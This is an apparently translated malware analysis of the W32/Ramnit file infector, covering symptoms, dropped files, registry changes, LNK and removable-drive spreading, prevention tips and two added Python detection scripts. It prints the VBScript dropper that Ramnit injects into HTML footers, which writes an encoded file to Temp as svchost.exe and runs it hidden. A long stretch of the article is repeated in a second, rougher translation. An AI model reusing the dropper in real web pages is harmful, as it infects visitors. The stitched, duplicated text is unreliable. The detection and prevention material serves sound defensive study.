W32/Ramnit
Now with the ability to exploit LNK (Shortcut)
If Stuxnet is the Cristiano Ronaldo of viruses, you may well ask which virus is the Messi. The answer is Ramnit. Although not as explosive as Stuxnet, its ability to infect victim files is no less than Stuxnet's, and Ramnit has clearly infected many computers in Indonesia, slowly but surely establishing itself as one of the virus "warlords" that computer users in Indonesia need to watch out for. Moreover, the latest Ramnit variant now has the ability to exploit the LNK (shortcut) security hole, so it can spread itself by creating shortcuts.
In 2010, Stuxnet's dominance, built on exploiting the LNK (shortcut) vulnerability, was a clever step ahead by malware authors. Stuxnet not only dominated, it also became a trending topic in malware articles and analyses worldwide.
While Stuxnet's domination is still booming today, we also need to be alert to new malware variants that try to prove their existence through the hard work of their authors. Among the malware variants worth watching is the one detected as W32/Ramnit by Norman Security Suite (see Figure 1). Ramnit variants have now spread rapidly around the world, and Ramnit attacks complete the domination of foreign malware spreading in Indonesia.
Figure 1. Norman detects the W32/Ramnit malware
The W32/Ramnit malware family
The Ramnit malware group is not really new; it was already actively spreading in 2010. It is just that malware such as Sality and Stuxnet, which exploited the LNK shortcut security hole, drew all the attention, so this malware was not a concern of analysts and computer users around the world.
Just like Stuxnet, the first W32/Ramnit variant appeared in mid-July and August 2010. The second W32/Ramnit variant appeared in October and November 2010, alongside Sality's shortcut attacks. And in mid-January 2011 the third variant of the W32/Ramnit family emerged, following in its predecessors' footsteps by using the LNK (shortcut) security hole to infect and spread.
Characteristics of W32/Ramnit
One reason we need to be careful about W32/Ramnit is that it belongs to the group of viruses that infect files, like Sality, Virut and Alman. This can be a scourge for computer users, because a virus that infects files, especially executable (application) files, is difficult to clean.
W32/Ramnit is one of the virus variants that infect executable (application) files. And not only executable files: it also infects web (HTML) files and DLL (dynamic link library) files.
Also, if you are connected to the internet, Ramnit will contact a remote server (IRC server) and connect to several zombie server addresses to download a set of malware (viruses, trojans, spyware). At certain times, W32/Ramnit displays ads and pop-ups with pornographic and gambling (casino) content and other commercial advertising that makes browsing and surfing uncomfortable. Imagine if this happens while your underage child is using a computer you have protected with Parental Control. For parents this is a disaster, because the child is exposed to pornography (the displayed pornographic content is likely to escape the Parental Control you installed), and for the child it might be considered "a blessing" that the protection against the tide of pornography turned out to be fooled.
By also exploiting the LNK (shortcut) security hole, it can infect users' computers more easily and quickly. Although not all three W32/Ramnit variants use the LNK (shortcut) security hole, almost all W32/Ramnit variants are very difficult to clean.
Symptoms and effects of W32/Ramnit
Some symptoms that occur if you are already infected are:
* Pop-up ads or pop-ups with pornographic / gambling content
At certain times the browser will open pop-up ads or pop-ups containing pornographic or gambling (casino) content. This makes the user's computer uncomfortable to use. (see Figure 2)
Figure 2. Pop-up ads launched by W32/Ramnit
* Script error pop-ups or error pop-ups after the pop-up ads appear
After the pop-up ads appear, a pop-up error or script error from the browser will appear. This script error looks like the one produced by the "ARP spoofing" virus of 2008. (see Figure 3)
Figure 3. Pop-up error or script error
* Infection of EXE and DLL files
Just like the Sality, Alman and Virut malware variants, W32/Ramnit infects exe files. Unlike them, W32/Ramnit also infects DLL (dynamic link library) files.
Infected exe and dll files grow by between 100 and 120 KB, depending on the Ramnit variant that infects them. Nevertheless, not all exe and dll files are infected.
* Injection of HTML files
Besides infecting exe files and others, W32/Ramnit also injects HTML files. The injection is done by adding a header and a footer. (see Figures 4 and 5)
In the header, W32/Ramnit adds the script:
Image 1, Norman detect malware W32/Ramnit
Family malware W32/Ramnit
Ramnit Malware malware group is not really new, but has been actively spread also in 2010. Just because of malware such as user security hole LNK shortcut, sality, stuxnet, which makes this malware is not a concern of the analysis and computer users in the world.
Just like stuxnet, variant W32/Ramnit first appeared in mid-July and August 2010. While the second variant W32/Ramnit appear in October and November 2010, along with his scene-sality attack shortcut. And in mid-January 2011 is currently emerging is the third variant of W32/Ramnit family who tried to follow in the footsteps of its predecessors by using the security hole LNK (shortcut) to carry the infection and spread.
Characteristics W32/Ramnit
One of the things that make us need to be careful of that because this malware W32/Ramnit including groups that perform infectious virus files like Sality, Virut and Alman. This can be a scourge for computer users, because it will be difficult to clean the virus is doing the file infection, especially executable files (application).
W32/Ramnit is one of the variant viruses that make infection executable file (application). And not only executable files, but also do infections on the web file (HTML) files and DLL (dynamic load library).
Also, if you connect to the internet, ramnit will contact a remote server (IRC server) and connect to multiple addresses zombie servers to download a set of malware (viruses, trojans, spyware). At some particular time, W32/Ramnit using ads and popups to the content of pornography and gambling (casinos) and other commercial advertising that would make you uncomfortable when about browsing and surfing. Imagine if this happens when your child is under the age of the computer you're using protection with Parental Control. For parents this disaster because your child is exposed to pornography (because chances are that displayed pornographic content would escape the Parental Control which in pairs) and for children it might be considered "a blessing" for protection in the tide of pornography which turned out to be tricked.
By also exploit security holes LNK (shortcut), then the easier step to infect computer users quickly. Although not all three variants W32/Ramnit using the security hole LNK (shortcut), but almost all variants W32/Ramnit will be very difficult to clean.
Symptoms & Effects W32/Ramnit
Some symptoms that occur if you are already infected are:
* Pop-up ads or pop-ups to the content of pornography / gambling
In some particular time, the browser will open a pop-up ads or pop-ups that contain pornographic content or gambling (casino). This sometimes makes the user's computer becomes uncomfortable. (see Image 2)
Image2, Pop-up ads that run W32/Ramnit
* Appears script error pop-ups or error after a pop-up ads that appear
After a pop-up ads that appear, will appear a pop-up error or script error from the browser. It appears this error script-like virus "ARP spoofing"in 2008. (see Figure 3)
Image3, Pop-up error or script error
* Infection of EXE and DLL files
Just as the variants of malware sality, Alman and Virut, W32/Ramnit make exe file infection. Only, W32/Ramnit also do infections on the DLL file (dynamic load library).
Exe and dll files in-infection increased by between 100-120 kb, depending on the variant that infects Ramnit. Nevertheless, not all exe and dll files in-infection.
* Injection HTML file
Besides infecting exe files and etc, W32/Ramnit also do injection of HTML files. Injection is done by adding the header and footer. (see image 4 and 5)
In the header, W32/Ramnit add the script:
DropFileName = "svchost.exe"
Figure 4. The script added to the header of the HTML file
In the footer, W32/Ramnit adds the script:
Set FSO = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(2) is the user's Temp folder; DropFileName is set in the header
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath) = False Then
    Set fileobj = FSO.CreateTextFile(DropPath, True)
    ' WriteData (not shown in the report) holds the dropped file as hex text
    For i = 1 To Len(WriteData) Step 2
        fileobj.write chr(CLng("&H" & Mid(WriteData, i, 2)))
    Next
    fileobj.close
End If
Set WSHshell = CreateObject("Wscript.shell")
WSHshell.Run DropPath, 0
Figure 5. The script added to the footer of the HTML file
* Making the Windows Services function blank
By injecting the Iexplore.exe and services.exe files, and adding a script to web files (htm / html), the malware makes the Windows Services function blank. (see Figure 6)
Figure 6. The Windows Services function made blank
* Making the computer hang / slow and even disconnecting network connections
The Windows system files targeted for injection by W32/Ramnit are:
- C:\WINDOWS\system32\svchost.exe (system file associated with the network connection; injecting it disconnects the network)
- C:\WINDOWS\system32\lsass.exe (system file related to computer activity; injecting it makes the computer hang / slow)
- C:\WINDOWS\system32\services.exe (system file associated with the services and drivers that run)
- C:\Program Files\Internet Explorer\Iexplore.exe (executable file of the Internet Explorer browser)
* Active as a process in memory
The W32/Ramnit malware tries to connect to the Remote Server using the injected Internet Explorer. This can be seen in Task Manager even though we have not opened IE / Internet Explorer (see Figure 7)
Figure 7. The Iexplore.exe (Internet Explorer) process injected by W32/Ramnit
* Connecting to a Remote Server
The W32/Ramnit malware connects to a Remote Server to deliver the information it has gathered; the analysis observed several Remote Server IP addresses being used for this.
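As an added illustration (not code from the original report), the following Python script uses the header and footer markers quoted above to flag injected HTML files and to strip only the injected script blocks. It assumes the VBScript is carried inside <script> tags, which the report does not show; the sample documents are constructed.

```python
import re

# Markers copied from the injected header/footer quoted in the report above.
HEADER_MARKER = re.compile(r'DropFileName\s*=\s*"svchost\.exe"', re.I)
FOOTER_MARKERS = [
    re.compile(r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    re.compile(r'GetSpecialFolder\s*\(\s*2\s*\)', re.I),  # 2 = the user's Temp folder
    re.compile(r'CreateTextFile\s*\(\s*DropPath', re.I),
    re.compile(r'CreateObject\s*\(\s*"Wscript\.shell"\s*\)', re.I),
    re.compile(r'WSHshell\.Run\s+DropPath', re.I),
]
# Assumption (the report shows only the script text): the VBScript sits in <script> tags.
SCRIPT_BLOCK = re.compile(r'<script\b[^>]*>.*?</script>', re.I | re.S)

def scan_html(text):
    """Return (infected, marker_hits). Three or more markers count as an infection,
    so a page that merely mentions FileSystemObject is not flagged."""
    hits = int(bool(HEADER_MARKER.search(text)))
    hits += sum(1 for m in FOOTER_MARKERS if m.search(text))
    return hits >= 3, hits

def disinfect_html(text):
    """Drop only the <script> blocks that carry Ramnit markers; other scripts stay."""
    def keep_or_drop(m):
        block = m.group(0)
        bad = HEADER_MARKER.search(block) or any(p.search(block) for p in FOOTER_MARKERS)
        return "" if bad else block
    return SCRIPT_BLOCK.sub(keep_or_drop, text)

# Constructed samples: a clean page and the same page with the injected header/footer.
CLEAN_HTML = '<html><head><script src="site.js"></script></head><body>Hi</body></html>'
INFECTED_HTML = r'''<script language="VBScript">DropFileName = "svchost.exe"</script>
<html><head><script src="site.js"></script></head><body>Hi</body></html>
<script language="VBScript">
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
Set fileobj = FSO.CreateTextFile(DropPath, True)
' (loop that decodes WriteData into the dropped file omitted)
Set WSHshell = CreateObject("Wscript.shell")
WSHshell.Run DropPath, 0
</script>'''

if __name__ == "__main__":
    for name, doc in (("clean", CLEAN_HTML), ("infected", INFECTED_HTML)):
        print(name, scan_html(doc))
    print("after disinfection:", scan_html(disinfect_html(INFECTED_HTML)))
```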
* Transferring data to a Remote Server
Besides trying to connect to and communicate with a remote server, W32/Ramnit also tries to transfer data from the victim's computer to the Remote Server and, conversely, send malware files to the victim's computer. (see Figure 8)
Figure 8. Data transfer between the victim's computer and the Remote Servers
* Broadcasting
Just like the Conficker worm, W32/Ramnit also broadcasts on the network. The difference is that W32/Ramnit only does so to one address, namely ADX.ADNXS.COM (see Figure 9)
Figure 9. Broadcast conducted by W32/Ramnit
The W32/Ramnit virus file
The W32/Ramnit malware was created in the C programming language and is compressed with UPX. The malware file has the following characteristics:
* Size 105 KB
* File type "Application"
* Uses the "music folder" icon
* Extension "exe"
When run, W32/Ramnit injects the following Windows system files:
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\services.exe
C:\Program Files\Internet Explorer\Iexplore.exe
If connected to the internet, W32/Ramnit will download the following malware files and folders:
C:\Documents and Settings\%user%\Local Settings\Temp\[number].tmp
C:\Documents and Settings\%user%\Local Settings\Temp\explorer.dat
C:\Documents and Settings\%user%\Local Settings\Temp\winlogon.dat
C:\Documents and Settings\%user%\Local Settings\Temp\[random_name].exe
C:\Documents and Settings\%user%\Start Menu\Programs\[random_name].exe
C:\Program Files\Intenet Explorer\complete.dat
C:\Program Files\Intenet Explorer\dmlconf.dat
C:\Program Files\win\[random_number].exe
C:\Program Files\qwe
C:\WINDOWS\[random_name].exe
C:\WINDOWS\System32\[random_name].dll
C:\WINDOWS\System32\[random_name&number].dll
C:\WINDOWS\Temp\[number].tmp
In addition, W32/Ramnit injects the following files (if present):
C:\contacts.html
C:\Inetpub\wwwroot\index.html
C:\Program Files\Common Files\designer\MSADDNDR.DLL
C:\Program Files\Common Files\designer\MSHTMPGD.DLL
C:\Program Files\Common Files\designer\MSHTMPGR.DLL
C:\Program Files\Common Files\System\ado\MDACReadme.htm
C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL
C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll
C:\Program Files\MSN\MSNIA\custdial.dll
C:\Program Files\MSN\MSNIA\msniasvc.exe
C:\Program Files\MSN\MSNIA\prestp.exe
C:\Program Files\MSN\MsnInstaller\iasvcstb.dll
C:\Program Files\MSN\MsnInstaller\msdbxi.dll
C:\Program Files\MSN\MsnInstaller\msninst.dll
C:\Program Files\MSN\MsnInstaller\msninst.exe
C:\Program Files\MSN\MsnInstaller\msnsign.dll
C:\Program Files\NetMeeting\netmeet.htm
It also creates several files on removable disks / drives:
autorun.inf
Copy of Shortcut to (1).lnk
Copy of Shortcut to (2).lnk
Copy of Shortcut to (3).lnk
Copy of Shortcut to (4).lnk
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[random_name1].exe ... [random_name11].exe (11 exe files)
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[random_name1].cpl ... [random_name11].cpl (11 cpl files)
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[random_name1].exe ... [random_name7].exe (7 exe files)
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[random_name1].cpl ... [random_name7].cpl (7 cpl files)
And on networks that use mapped drives, it tries to inject files with the following names:
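Added example, not from the original report: a Python triage function that scores a removable drive's file listing against the indicators above (autorun.inf, the "Copy of Shortcut to (N).lnk" files, and exe/cpl payloads under RECYCLER folders whose SID-like names do not carry the S-1-5-21 prefix of real account SIDs). The sample listings are constructed.

```python
import re
from collections import Counter

# Patterns derived from the removable-drive listing in the report above.
LNK_COPY = re.compile(r'^Copy of Shortcut to \(\d+\)\.lnk$', re.I)
RECYCLER_PAYLOAD = re.compile(r'^RECYCLER[\\/](S-\d+(?:-\d+)+)[\\/][^\\/]+\.(exe|cpl)$', re.I)
# Genuine per-user RECYCLER folders are named after account SIDs, which start with
# S-1-5-21-; the folders in the report (S-3-4-70-..., S-8-1-53-...) do not.
REAL_SID_PREFIX = "S-1-5-21-"

def triage_removable_drive(paths):
    """Return (infected, findings) for a list of paths relative to the drive root."""
    findings, lnk_count, bad_sids, payloads = [], 0, set(), Counter()
    for p in paths:
        p = p.strip().lstrip("\\/")
        if p.lower() == "autorun.inf":
            findings.append("autorun.inf at drive root")
        elif LNK_COPY.match(p):
            lnk_count += 1
        else:
            m = RECYCLER_PAYLOAD.match(p)
            if m:
                payloads[m.group(2).lower()] += 1
                if not m.group(1).upper().startswith(REAL_SID_PREFIX):
                    bad_sids.add(m.group(1))
    if lnk_count:
        findings.append(f"{lnk_count} 'Copy of Shortcut to (N).lnk' files")
    for sid in sorted(bad_sids):
        findings.append(f"RECYCLER folder with non-account SID {sid}")
    for ext, n in sorted(payloads.items()):
        findings.append(f"{n} .{ext} file(s) under RECYCLER")
    # One stray finding (e.g. an exe in a real user's recycle bin) is not enough;
    # the Ramnit pattern produces autorun + shortcuts + RECYCLER payloads together.
    return len(findings) >= 3, findings

# Constructed listings: one matching the report's pattern, one ordinary drive.
SUSPECT_LISTING = [
    "autorun.inf",
    *[f"Copy of Shortcut to ({i}).lnk" for i in range(1, 5)],
    "RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/kdqw.exe",
    "RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/xmpt.cpl",
    "RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/rfoa.exe",
    "Documents/report.docx",
]
CLEAN_LISTING = ["Documents/report.docx", "RECYCLER/S-1-5-21-1004336348-1177238915-682003330-1001/Dc1.txt"]

if __name__ == "__main__":
    for name, listing in (("suspect", SUSPECT_LISTING), ("clean", CLEAN_LISTING)):
        print(name, *triage_removable_drive(listing))
```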
- Blank.htm
- Citrus Punch.htm
- Clear Day.htm
- Fiesta.htm
- Ivy.htm
- Leaves.htm
- Maize.htm
- Nature.htm
- Network Blitz.htm
- Pie Charts.htm
- Sunflower.htm
- Sweets.htm
- Technical.htm
Registry Modifications
Some registry modifications made by W32/Ramnit are as follows:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[random_name] = C:\Documents and Settings\%user%\Local Settings\Temp\[random_name].exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol\FEATURE_BROWSER_EMULATION
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\international
Delete registry
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
DisableSR = 0x00000001
Edit Registry
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
CurrentLevel =
1601 =
Distribution Methods
W32/Ramnit spreads in the following ways:
Drive-by downloads (exploit)
W32/Ramnit initially spread by exploiting drive-by downloads on Windows systems. Using links spread on forums or by e-mail, it tries to trick the user into running the link. It also spreads when users access websites that offer content or browser plugins for download.
Removable drive / disk
Removable media are commonly used by computer users. W32/Ramnit creates many files on them to infect a computer, and also exploits the LNK (shortcut) security hole. (see Figure 10)
Figure 10. Removable disk / drive infected by W32/Ramnit
Network
W32/Ramnit tries to inject a few specified web files (htm) on computers in the network that have mapped drives. The files are the same ones listed above, from Blank.htm to Technical.htm.
Tips to prevent W32/Ramnit malware
- Turn on Windows Firewall or use other firewall software, to block unwanted access.
- Make sure the computer gets the latest Windows updates. The simplest way is to use the system's "Automatic Updates"; the latest patches can also be downloaded from the Microsoft website.
- Use antivirus software that is always kept up to date, so that new malware variants are detected more easily.
- Restrict administrator access. For users of Windows 7 and Vista, make sure UAC (User Account Control) is working properly.
- Be cautious when opening e-mail attachments or receiving file transfers from strangers. Always scan them with an updated antivirus.
- Be wary of cracks / keygens or unknown programs, as they may be infected with or contain malware.
- Use a password that is not easy to read or guess. Change the password regularly, and use different passwords for different accounts.
- Turn off Windows "autoplay" so that unwanted programs on a removable drive / disk do not run automatically.
- Turn off file sharing if it is not used.
- If you do use file sharing, make it read-only, or configure sharing only for specific users.
- Be careful when accessing a website or forum that offers certain links to be downloaded or installed.